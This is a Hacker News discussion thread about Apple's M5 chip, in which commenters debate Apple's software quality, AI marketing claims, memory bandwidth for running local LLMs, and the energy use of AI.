      What makes Mac great is/was the ecosystem of 3rd party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "louder" which... may become a problem.

      I still agree that second hand Thinkpads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

      • markus_zhang 19 hours ago

        I have to admit, every time I looked into screenshots of earlier Macs, like the 68K and PPC ones, I felt I loved the UI and such. I even bought a PPC laptop (I think it's a maxed out iBook with 1.5GB of RAM) to tinker with PPC assembly.

        But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI is better.

        • prewett 16 hours ago

          Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The featureset, though, was limited. Managing extensions was clunky, and until MacOS 10, applications had a fixed amount of RAM they could use, which could be set by the user, but which was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

          I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system error bomb icon was classic, the sad-Mac boot-failure icon was at least consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

          • markus_zhang 14 hours ago

            Interesting. I thought the new MacOS was unix-y? But I never owned a Mac back then so not sure. For me Windows 2000 is the pinnacle. It doesn't crash (often), supports most of the games I played then, and I like the UI design.

  • amelius 18 hours ago

    Yes. And their consumer teams are way outperforming their business teams.

  • tantalor 20 hours ago

    Been like that since 1977

  • gloosx 16 hours ago

    From my vast experience with MacOS, Apple is notoriously bad at the most basic software, like notes or calculator

    • robenkleene 10 hours ago

      What's a better rich-text notes app than Apple Notes? (E.g., excluding the plain-text options like Obsidian, which are really a different beast.)

      • gloosx 3 hours ago

        I don't know. I used apple notes for quite a while, several years. And I got increasingly frustrated by it's countless bugs and inconsistent or weird behaviours, especially with check lists which I use a lot. I even have a folder with tens of screencasts capturing these bugs which I want to compile and publish in a blog post one day. I ended up with my own web-based solution on top of Lexical, which I wrapped in a Tauri app, which I very much enjoy using. I don't need it to sync to other devices so all notes and images rest in a filesystem.

  • crazygringo 17 hours ago

    Apple is a hardware company. This has always been the case. It's not just the modern Apple.

  • oofbey 18 hours ago

    In a sense, hardware's job is easier, because the goals are more clear. Make it faster, and more power efficient. Vast amounts of complexity within those goals. But try to summarize the north-star vision for a complex software project like an OS in terms anywhere close as simply as this.

  • wslh 19 hours ago

    I've been thinking whether it could be a reasonable move for Apple to launch a cheaper secondary brand, one that offers devices capable of running Linux or Windows to reach a broader market without cannibalizing its own.

    • dawnerd 19 hours ago

      Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.

  • throw_this_one 20 hours ago

    Their software is literally falling apart. ios26 was the biggest trash ive ever experienced from a company this big

    • pivo 20 hours ago

      How so? Seriously asking because it works fine for me.

      • throw_this_one 18 hours ago

        Buggy. Random slowness in the UI going well below 120hz. Massive battery drain for no reason. UI elements just looking out of place, big print, random places.

        The UI itself is supposed to be intense to render to some degree. That's crazy because most of the time it looks like an Android skin from 2012.

        And on top of this all -- absolutely nobody asked for this. No one asked for some silly new UI that is transparent or whateveer.

        • lijok 17 hours ago

          Sounds like an experience problem

    • vuggamie 20 hours ago

      I'm old enough to remember Windows CE phones crashing during phone calls.

  • 7e 19 hours ago

    Apple relies heavily on H1-B slave labor. They don’t pay their software teams enough to be competitive and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound foolish.

mohsen1 20 hours ago

First time seeing Apple using "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...

  • mentalgear 20 hours ago

    Unfortunately, they have also succumbed to the AI hype machine. Apple, calling it by its actual name "machine learning" was about the only thing I still liked about Apple.

    • rpdillon 20 hours ago

      Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

      https://www.apple.com/apple-intelligence/

      • kryllic 20 hours ago

        Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency and the unruly nature of LLM's is something I'm shocked they thought they could tame in a short amount of time. The fallout of the hilariously bad news/message "summaries" were more than enough to spook Apple from allowing that to go much further.

        >Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

        The asterisks are really icing on the cake here.

        ---

        [1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

    • kgwgk 20 hours ago

      > actual name "machine learning"

      Yesterday’s hype is today’s humility.

    • adastra22 16 hours ago

      Machine learning is a bit more specific than what we now call AI, no?

      • asadotzler 12 hours ago

        the other way around.

        • adastra22 11 hours ago

          I don’t follow. Machine learning was coined to specifically describe the application of neural networks to unsupervised classification systems. Its meaning has grown beyond that, but at the outset, it was a niche part of artificial intelligence. Now you’re saying that AI is a subset of machine learning?

          • zargon 3 hours ago

            > what we now call AI

            (Emphasis added)

            When a company (or most people) today (now) says “AI”, they are not referring to the area of study traditionally called artificial intelligence. They are talking exclusively about transformers or diffusion.

          • I_AM_A_SMURF 4 hours ago

            Lately AI = LLM (at least in popular culture).

  • vessenes 19 hours ago

    I like sniping - but I could make a product call here to support the messaging - when it's running outside diffusion models and LLMs (as per the press release) we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR though

  • low_tech_punk 20 hours ago

    Not all is lost: AI can still be acronym for Apple Intelligence.

  • vayup 18 hours ago

    I am sure by AI they mean Apple Intelligence:-)

outcoldman 20 hours ago

Marketing:

M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both iPad and MBP M5 [2][3] say "delivering up to 3.5x the AI performance". But all the examples of AI (in [3]), they are 1.2-2.3X faster than M4. So where this 3.5X is coming from? What tests did Apple do to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

  • storus 17 hours ago

    M5 is supposed to support FP4 natively which would explain the speed up on Q4 quantized models (down from BF16).

  • relativeadv 20 hours ago

    Its not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one

    • outcoldman 17 hours ago

      I referenced everything about comparing to M4. I left outside the comparison with M1.

Noaidi 20 hours ago

I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use for many reasons, but mainly because of Climate Change) their focus, I am afraid they are losing and making their operating Systems worse.

For instance, Liquid Glass, the mess I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An Aplha release in my opinion which I feel was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

  • Tagbert 17 hours ago

    Most of the AI and Machine Learning Apple has done so far are primarily done on device so you can see whether there is any climate change concern or not.

  • knotimpressed 20 hours ago

    Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

    I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

    • Noaidi 19 hours ago

      Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user and it seems to take up space on the phone as well. I refuse to use iCloud so space is important to me since photography is what I do the most.

      Also, I like researching things old school how I learned in college because I think it leads to unintended discoveries.

      I do not trust the source you linked to. It is an organization buried under organizations for which I cannot seem to find their funding source after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

      https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

      Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

      Altruism: unselfish regard for or devotion to the welfare of others

      There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

      But the organization stinks as some kind of tech propaganda arm to me.

    • adastra22 15 hours ago

      > I totally understand why someone would refuse to use it due to environmental reasons

      Huh. This one baffles me.

      • AuryGlenz 4 hours ago

        Energy use, presumably.

        Of course, are those same users always running their screens super dim? Are they using pen + paper instead of typing whenever they can?

    • sylens 20 hours ago

      > could you elaborate on why you don't use Apple Intelligence?

      Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade, they are not owed the benefit of the doubt

    • pcdoodle 20 hours ago

      For me: unproven trust and no killer feature.

      If I can't search my Apple Mail without AI, why would I trust AI?

    • timeon 19 hours ago

      Not sure why would one think that article is something other than distraction attempt. Because emissions are adding up.

      I'm from country (in Europe) where CO2 emissions per capita [0] are 5.57 while number for USA is 14.3, so reading this sentence in that article: "The average American uses ~50,000 times as much water every day..." surly does not imply that one should use ChatGPT because it is nothing. If "average American" wants to decrease emissions then not using LLMs is just start.

      [0]: https://ourworldindata.org/grapher/co-emissions-per-capita

      • NetMageSCW 11 hours ago

        This isn’t about ChatGPT this is about Apple Intelligence which is an on-device low power ML system.

  • StopDisinfo910 20 hours ago

    > making Apple AI [...] their focus

    Are they really doing that? Because if it's the case they have shockingly little to show for it.

    Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find a public. Liquid Glass is to put it politely divisive.

    At that point to me, it seems that good SoC and a captive audience in the US are pretty much all they have remaining and competition on the SoC part is becoming fierce.

    • Noaidi 19 hours ago

      Yeah, I agree, they have a captive audience for sure. But they still need to satisfy share holders. If people are failing to upgrade that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out and they were tracking it better. This, unfortunatly, makes me think conspiratorially. Even a modest about of extra battery use and degradation will mean more upgrades in the future.

      But I think $500 billion is a lot of money for AI:

      Apple accelerates AI investment with $500B for skills, infrastructure

      https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

      Imagine using $500 for the operating system and squashing bugs or making the system even more energy efficient? Or maybe figuring out how to connect to an android tablet's file system natively?

  • steinvakt2 20 hours ago

    If you don’t use AI for climate reasons then you should read the recent reports about how little electricity and water is actually used. It’s basically zero (image and video models excluded). Your information about this is probably related to GPT3.5 or something. Which is now 3 years old - a lifetime in AI world.

    • greekrich92 20 hours ago

      Big data centers running tons of GPUs and the construction of even bigger ones is not carbon neutral come on

    • wat10000 20 hours ago

      Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.

      • trenchpilgrim 20 hours ago

        They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)

        • wat10000 18 hours ago

          Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.

          • trenchpilgrim 16 hours ago

            Indeed, this is correct. See today's Claude Haiku 4 announcement for an example.

  • imcritic 20 hours ago

    I think they will continue ruining their products via software updates. That's implied by a walled garden approach they chose to do their business: this forces users to consoom more and thus generates profits. Apple isn't a "lean" company, it needs outrageous profits to stay afloat.

  • jeffbee 19 hours ago

    I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.

    • Noaidi 18 hours ago

      I live in a van full time. I have a 200w solar panel and a 1500w output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much really. Driving is my biggest carbon footprint but I really do not put much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled so that makes a lot of it easier. Being poor dramatically lowers ones carbon footprint.

      • jeffbee 18 hours ago

        If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.

        • leakycap 16 hours ago

          What a nice way to talk to another person who... didn't attack you?

          A typical passenger car driving 12,000 miles puts out about 5 metric tons of C02

          The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of C02 (Miami vs. Minnesota makes a huge difference)

          So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

          Care to be a little kinder next time you feel whatever compelled you to write you response to the other user? Jeesh.

        • Noaidi 14 hours ago

          First, I need my van. My van is my house.

          > Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

          Still, even lets say your number are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

          Driving my van for my yearly average creates about 4.4 metric tons of CO2.

          "A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

          https://news.climate.columbia.edu/2023/06/09/ais-growing-car...

          Just to get an idea of how I conserve, another example is I only watch videos in 480 becasue it uses less power. This has a double benefit for me since it saves my solar battery as well.

          I am not bragging, just showing what is possible. Right now, being tsill this week in the desert, my carbon footprint is extremely low.

          Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and green-washing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

          But this paper from 5/25:

          https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

          says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

          And

          "Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

          And

          "The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

          So the confusion and obfuscation is enough for me to avoid it. I think AI shoudl be restaind to research, not to be used from most of the silliness adn AI slop that is being produced. Because yiou know, we are not even counting the AI slop views that also take up data space and energy by people looking at it all.

          But part if why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instad of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

    • timeon 19 hours ago

      Depends where you are. People in some countries have lot of catching up: https://ourworldindata.org/grapher/co-emissions-per-capita

      Maybe they are in USA - every little think counts there.

      • Noaidi 18 hours ago

        I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

        So, to keep this on point, Apple making a faster chip is not on my climate change agenda and anything but negative.

      • jeffbee 18 hours ago

        No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.

yalogin 20 hours ago

It feels like apple is “ a square peg in a round hole” when it comes to AI - atleast for now.

They are not the hardware provider like nvidia, they don’t do the software and services like OpenAI or even Microsoft/oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things but the only way to showcase them is through their phone which ironically enough feels like not the best path for apple.

Apple’s best option is to put llms locally on the phone and claim privacy (which is true) but they may end up in the same Siri vs others situation, where Siri always is the dumber one.

This is interesting to see how it plays out

  • mirekrusin 19 hours ago

    Being late in AI race or not entering it from training side is not necessarily bad, others have burned tons of money, if Apple enters with their hardware first (only?) it may disrupt status quo from consumer side. It's not impossible that they'll produce hardware everybody will want to run local models that will be on par with closed ones. If this happens it may change real money flow (as opposed to investor based on imaginary evaluation money that can evaporate).

  • mft_ 17 hours ago

    They are the leader in manufacturing consumer systems with sufficient high-bandwidth memory to enable decent-sized LLMs to be run locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM) they're your only widely-available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper.)

    This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple market on, as they can't monetize it. However, as time goes on and memory and compute power gradually decrease in price, and also maybe as local LLMs continue to increase in ability (?) it may become more and more relevant.

    • yalogin 16 hours ago

      All current use cases, the ones that caught the public eye, just don't have a need for locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs and that is hard to do. There aren't that many use cases for it as the input vectors all map to an app or camera. Even then a full fledged LLM is always better than a quantized, low precision one running locally. Yeah, increased compute is the way, but not a silver bullet as Vision and Audio bound LLMs require large amounts of memory

nik736 21 hours ago

This is only the base model, no upgrades yet for the Pro/Max version. The memory bandwidth is 153GB/s which is not enough to run viable open source LLM models properly.

  • wizee 20 hours ago

    153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

    Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.

    • zamadatix 20 hours ago

      Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

      Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

      • cma 19 hours ago

        M5 says 3X thunderbolt 5, should be able to do 240G bidirectional in total. Not that useful yet with max 32GB of RAM though.

  • replete 14 hours ago

    Looks like the M5 base has LPDDR5x-9600, which works out to 153.6 from base M4's 120GB/s DDR5x-7500. The Pro/Max versions have more memory controllers, 16, 24 and 32 channels accordingly. The 32 channel M5 top-end version will have 614GB/s by my calculations.

    It would take 48 channels of DDR5x-9600 to match a 3090's memory bandwidth, so the situation is unlikely to change for a couple of years when DDR6 arrives I guess

  • mpeg 21 hours ago

    The memory capacity to me is an even bigger problem, at 32GB max.

    • sgt 20 hours ago

      That'll come in the MacBook Pro etc cycle, like last time, then you'll have 512GB RAM

      • bombcar 20 hours ago

        Is the M4 Ultra even out yet? I can't see anything with 512 GB but the M3 Ultra on the Mac Studio (for a cool $4000 more).

        • asimovDev 19 hours ago

          i am interested in seeing if they skip m4 and go straight to M5 and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter, I wouldn't be surprised if M5 Ultra would struggle in a Studio and would require cooling performance of the Mac Pro case

      • mpeg 20 hours ago

        Same with bandwidth though, usually pro/max memory has much higher speed

        • andy_ppp 20 hours ago

          Yes the M4 Base has 120 GB/s, Pro 273 GB/s and Max has 546 GB/s... That means M5 Pro is potentially around 348 GB/s and M5 Max is almost at 700 GB/s - for comparison a 4090 has around 1,000 GB/s. So pretty incredible!

          • sgt 17 hours ago

            Also I think even an M3 Ultra is more cost effective at running LLMs than 4090 or 5090. Mostly due to being more energy efficient. And less fragile than running a gamer PC build.

            • andy_ppp 17 hours ago

              It can run larger models quite slowly but lacks matmul acceleration (included in the M5) that is very useful for context and prompt performance at inference time. I will probably burn my budget with an M5 Max with 256gb (maybe even 512gb) memory, the price will be upsetting but I guess that is life!

              • sgt 15 hours ago

                Yes! I think smaller models on the M3 Ultra is interesting enough, but now with matmul/ tensors on M5 Ultra or Max, with decent unified mem, it will be a gamechanger.

                I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

                • andy_ppp 2 hours ago

                  Yes completely, my guess is M6 will have external GPUs perfect for AI accelerators at home and in datacenters.

          • replete 14 hours ago

            I think the M5 Max will be more like 614GB/s, unless they somehow have exceeded DDR5x-9600 or added more than 32 memory controllers

            • andy_ppp 2 hours ago

              DDR5-9600 is 153GB/s from a single channel, Max has 4 channels… these are all theoretical values of course - real world none of these, even the graphics card will get that near to those… so not sure what you’re saying.

    • iyn 19 hours ago

      Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.

  • czbond 20 hours ago

    I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?

    • Sohcahtoa82 18 hours ago

      Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

      So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out ~11 tokens/sec, regardless of how my processing power you have.

      You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.

      • adastra22 15 hours ago

        I think you mean GB/token

        • Sohcahtoa82 15 hours ago

          Err...yup. My bad. Can't edit it now.

    • modeless 20 hours ago

      The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

      I highly recommend Andrej Karpathy's videos if you want to learn details.

      • pfortuny 19 hours ago

        A very simplified version is: you need all the matrix to compute a matrix x vector operation, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong but if you add up compression, etc… you get an idea.

      • rs186 18 hours ago

        Would you mind specifying which video(s)? He has quite a lot of content to consume.

  • diabllicseagull 20 hours ago

    You don’t want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153GB/s is probably not enough bandwidth for an Rtx5090. But for the entry laptop/tablet chip M5? It’s likely plenty.

  • chedabob 20 hours ago

    My guess would be those are going into the rumoured OLED models coming out next year.

  • hu3 21 hours ago

    Enough or not, they do describe it like this in an image caption:

    "M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

  • Tepix 19 hours ago

    With MoE LLMs like Qwen 3 30B-A3B that's no longer true.

  • quest88 21 hours ago

    What do you mean by properly? What’s the behavior one would observe if they did run an llm?

    • burnte 20 hours ago

      "Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.

    • nik736 21 hours ago

      If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.

      • Rohansi 18 hours ago

        You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.

paxys 18 hours ago

M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

  • quitit 17 hours ago

    You wrote:

    >Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

    They wrote:

    > Together, they deliver up to 15 percent faster multithreaded performance over M4

    The problem is comprehension, not marketing.

    • Choco31415 17 hours ago

      Not quite. The announcement mentions that:

      “M5 delivers over 4x the peak GPU compute performance for AI”

      In this situation, at least, it’s just referring to AI compute power.

      • mort96 13 hours ago

        Their "peak GPU compute performance for AI" is quite different from your unqualified "performance". I don't know what figures they're quoting, but something stupid like supporting 4-bit floats while the predecessor only supported down to 16-bit floats could easily deliver "over 4x peak GPU compute performance for AI" (measured in FLOPS) without actually making the hardware significantly faster.

        Did they claim 4x peak GPU compute going from the M3 to M4? Or M2 to M3? Can you link to these claims? Are you sure they weren't boasting about other metrics being improved by some multiplier? Not every metric is the same, and different metrics don't necessarily stack with each other.

      • teaearlgraycold 15 hours ago

        Much of this is probably down to optimized transformer kernels.

    • CryptoBanker 17 hours ago

      I think you’re the one misreading here. The 15% refers to CPU speed while the 6x, etc. multiples refer to GPU speed

      • graeme 16 hours ago

        GPU for ai workloads. That plausibly is that much faster as the intel laptops with integrated GPUs weren't made for that workload.

  • random3 18 hours ago

    The disconnect is that you're reading sideways.

    First line on their website:

    > M5 delivers over 4x the peak GPU compute performance for AI compared to M4

    It's the GPU not the CPU (which you compare with your old Intel) and it's an AI workload, not your regular workload (which again is what you compare)

    • bangaladore 17 hours ago

      And they are comparing peak compute. Which means essentially nothing.

      • random3 17 hours ago

        There was a time when Apple decided throwing random technical numbers shouldn't be the news (those were following the times of Megahertz counting). These times have been changing post Steve Jobs. This said, it is a chip announcement rather than a product announcement, so maybe that is the news.

        • edmundsauto 16 hours ago

          They also lost big during the megahertz wars. Consumers made it clear that they wanted to see number go up and voted with their wallet. There is probably still some cultural remnant of that era.

      • tempodox 17 hours ago

        Do not trust any statistics you did not fake yourself.

  • thebitguru 18 hours ago

    Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership, otherwise good hardware with bad software still leads to bad product, which is what we are seeing now.

    • heresie-dabord 17 hours ago

      > Apple has also seemingly stopped caring about the quality and efficiency of their software.

      Hardware has improved significantly, but it needs software to enable me to enjoy using it.

      Apple is not the only major company that has completely abandoned the users.

      The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

    • Rover222 16 hours ago

      iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.

    • taf2 17 hours ago

      i think 15.6.1 (24G90) will be my last mac osx... omarchy is blazing fast

    • drcongo 17 hours ago

      I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.

    • cmcaleer 17 hours ago

      It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

      No. You exit the mail app -> Go to settings -> apps -> scroll through a massive list (that you usually just use for notification settings btw) to go to mail -> mail accounts -> add new account.

      Just a simple six-step process after you’ve already hunted for it in the mail app.

      • jrmg 17 hours ago

        There’s an “Accounts...” entry in the main “Mail” menu.

        You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

      • ant6n 17 hours ago

        I think the most most basic integration w.r.t. email I want from Apple is that I want to set up another email program besides “Mail” as the default email program, but without having to set up Mail first.

  • cj 17 hours ago

    I’m not sure I see the disconnect.

    At our company we used to buy everyone MacBook Pros by default.

    After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order MacBook Airs for new employees.

    I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

    • wlesieutre 17 hours ago

      What's crazy about that to me is the Macbook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.

      • mort96 13 hours ago

        Well, the power efficiency about Apple Silicon combined with their firmware and drivers is really something. ARM doesn't have much to do with it.

        • zenware 11 hours ago

          Well, I hate to be the bearer of bad news, but Apple Silicon CPUs are entirely based on ARM architecture, and they elected to use ARM architecture, among other reasons, because it has lower power consumption and lower heat generation compared to CISC architectures.

          • matthewmacleod 6 hours ago

            This is just fokelore.

            “ARM architecture” in the sense it’s used by Apple is just an ISA. The ISA obviously has some effect on power consumption (e.g. avoiding complex CISC decode). But in reality, by far the most significant driver of CPU efficiency and power consumption is process node.

    • charliebwrites 17 hours ago

      Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

      I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

      The only thing it can’t do is run Ableton in a low latency way without strongly changing the defaults

      You press a key on the keyboard to play a note and half a second later you hear it

      Other than that, zero regrets

      • cyberpunk 16 hours ago

        That’s weird, my m1 air handles ableton absolutely fine.

        something’s off with your setup.

    • hartator 17 hours ago

      > After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

      Regular MBs are not really a thing anymore. You mean Airs?

      • cj 17 hours ago

        Yes, fixed!

    • hibikir 15 hours ago

      In 2021, we bought everyone M1 Pros with 32 gigs of ram. Historically, keeping a developer in a 4 year old laptop would have been crazy, but nobody is really calling for upgrades, like we did back when we got rid of the Intels.

    • ahmeneeroe-v2 16 hours ago

      Absolutely true. I now know that I only need an MBA, not an MBP.

  • condiment 18 hours ago

    It's GPU performance.

    Spin up ollama and run some inference on your 5-year-old intel macbook. You won't see 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

    • blihp 17 hours ago

      Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

      [1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

    • jandrese 18 hours ago

      Comparing GPU performance to some half decade old Intel IGP seems like lying with statistics.

      "Look how many times faster our car is![1]"

      [1] Compared to a paraplegic octogenarian in a broken wheelchair!"

      • umanwizard 17 hours ago

        Well, Apple isn’t making that comparison, the OP was.

  • leakycap 16 hours ago

    > So, where is the disconnect here?

    > I can say with utmost certainty that it isn't 4000x faster

    The numbers you provided do not come to 4000x faster (closer to 2400x)

    > Why is actual user experience not able to keep up with benchmarks and marketing?

    Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

    The 5x 6x 4x numbers you describe across marketing across many years don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them and the marketing worked because the only thing you're recalling is the big number.

    Often, every M-series chip is a HUGE advancement over the past in GPU. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing it to is often an Intel iGPU like the Iris Xe or UHD series. These were low end trash iGPUs even when Apple launched those Intel devices, so being impressed by 5x performance when the M1 came out was in part because the Intel Macs had such terrible integrated graphics.

